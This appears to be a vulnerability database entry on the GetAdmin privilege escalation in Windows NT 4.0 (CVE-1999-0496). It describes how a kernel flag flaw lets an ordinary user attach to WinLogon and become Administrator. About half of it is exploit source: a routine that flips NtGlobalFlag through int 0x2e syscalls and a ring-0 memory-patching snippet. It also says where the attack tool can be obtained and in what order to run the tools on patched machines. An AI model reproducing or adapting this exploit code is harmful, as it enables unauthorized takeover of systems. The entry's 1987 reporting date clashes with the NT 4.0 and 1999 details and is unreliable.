Brief description: program gives Administrator rights
Full description: Getadmin.exe attaches to the WinLogin process, which is running in the system's security context. It then makes standard API calls that add the specified user to the administrators group.
Any account that has rights to "Debug Programs" will always be able to run Getadmin.exe successfully because the "Debug Programs" right allows a user to attach to any process. The "Debug Programs" right is initially granted to Administrators and should be only granted to fully trusted users. Members of the administrators group always have the rights to make the calls GetAdmin.exe needs in order to succeed. So, if an account in that group runs Getadmin.exe , it works.
Getadmin.exe must be executed locally and works for accounts on a workstation or member server and for domain accounts on a primary domain controller (PDC). The utility does not function on a backup domain controller (BDC) because the account database on a BDC is read only. The only way to use GetAdmin to modify a domain account database is to log on to a primary domain controller and run the utility locally on the PDC.
Getadmin.exe works because of a problem in a low-level kernel routine that causes a global flag to be set which allows calls toNtOpenProcessToken to succeed regardless of the current users permissions. This in turn allows a user to attach to any process running on the system, including a process running in the system's security context, such as WinLogon. Once attached to such a process, a thread can be started in the security context of the process.
Components: WinLogin process, NtOpenProcessToken
Systems: Windows NT 4.0 (workstation, server, and terminal server editions) with SP-2 or earlier, or with stndard SP-3 patch (there is a version of SP-3 for this problem), not in Windows NT 3.51
Effect(s) of exploiting: The user acquires Administrator privileges.
Detecting the hole:
Fixing the hole:
Other information: The Registry keys accessed are: Policy key, Security policy description key, unknown,
program, attack tool
PA Classification(s): not yet classified
RISOS Classification(s):
DCS Classification(s):
CVE Number: cve-1999-0496 -- A Windows NT 4.0 user can gain administrative rights by forcing NtOpenProcessToken to succeed regardless of the user's permissions, aka GetAdmin.
Attack: The attack tool is available from Fravia or from Pete Shipley
Here is the code, by Konstantin Sobolev. Call
ChangeNtGlobalFlag(GetNtGlobalFlagPtr());
where:
BOOL ChangeNtGlobalFlag(DWORD pNtGlobalFlag)
{
DWORD callnumber = 0x3; //NtAddAtom
DWORD stack[32] ;
int i;
DWORD handle=0;
CHAR string[255];
if(!pNtGlobalFlag) return 0;
stack[0] = (DWORD)string;
stack[1] = (DWORD)&handle; //pNtGlobalFlag;
for(i=0;i <= 0x100;i++)
{
sprintf(string,"NT now cracking... pass %d",i);
if(handle & 0xf00){
stack[1] = (DWORD)pNtGlobalFlag+1;
}
__asm{
mov eax, callnumber;
mov edx, stack;
lea edx,dword ptr [stack];
int 0x2e;
}
if( stack[1] == pNtGlobalFlag+1) break;
}
return TRUE;
}
To get administrator rights on a hotfixed machine,
run
crash4.exe
then run
getadmin.exe
.
Exploit code follows:
/*
Running ring 0 code.
Author: Costin RAIU
#include standard_disclaimer
****** NOTICE:
COMPILE THIS WITH BORLAND C 5.0 ONLY!!! DOES NOT WORK WITH VC++!!!
******
*/
void* a[2];
void main(void) {
int i;
for (i=0;i<2;i++) a[i]=(void*)0;
*(char*)(0x4080a4)=0x80; //or bptr [NtGlobalFlag+2],0f
*(char*)(0x4080a5)=0x0d;
*(char*)(0x4080a6)=0xb6;
*(char*)(0x4080a7)=0xc2;
*(char*)(0x4080a8)=0x14;
*(char*)(0x4080a9)=0x80;
*(char*)(0x4080aa)=0xc1;
*(char*)(0x4080ab)=0xcf;
_asm
{
mov eax,4346
mov edx,offset a
int 2eh
}
}
Advisories: none yet
Related Vulnerabilities: none yet
Reporting: Konstantin Sobolev; Costin Raiu in ntbugtraq (June 30, 1987)